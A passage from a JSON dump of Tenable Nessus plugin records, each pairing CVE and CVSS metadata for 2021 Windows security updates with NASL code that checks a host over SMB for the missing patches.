script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005040'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:10240,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005040])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:06:25", "description": "The remote Windows host is missing security update 5005106 or cumulative update 5005076. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. 
An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005106.NASL", "href": "https://www.tenable.com/plugins/nessus/152433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152433);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005076\");\n script_xref(name:\"MSKB\", value:\"5005106\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005076\");\n script_xref(name:\"MSFT\", value:\"MS21-5005106\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005106\nor cumulative update 5005076. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005076-monthly-rollup-bf677fed-96d9-475e-87c1-a053fa75fef7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e0382f6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005106-security-only-update-d1ab5a34-55c1-4f66-8776-54a0c3bf40a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da6a50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005106 or Cumulative Update KB5005076.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005106',\n '5005076'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005106, 5005076])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:04:00", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. 
An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-18T15:16:43", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. 
(CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-34527", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-34527\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/07/20\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0034\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. 
An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42276,\n CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-34527\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n rollup_date:'11_2021',\n os_build:'22000',\n bulletin:bulletin,\n rollup_kb_list:[5007215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:35:17", "description": "The remote Windows host is missing 
security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. 
(CVE-2021-41356, CVE-2021-42284)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007189: Windows 10 Version 1909 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42288"], "modified": "2022-11-21T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007189.NASL", "href": "https://www.tenable.com/plugins/nessus/154989", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154989);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/21\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n 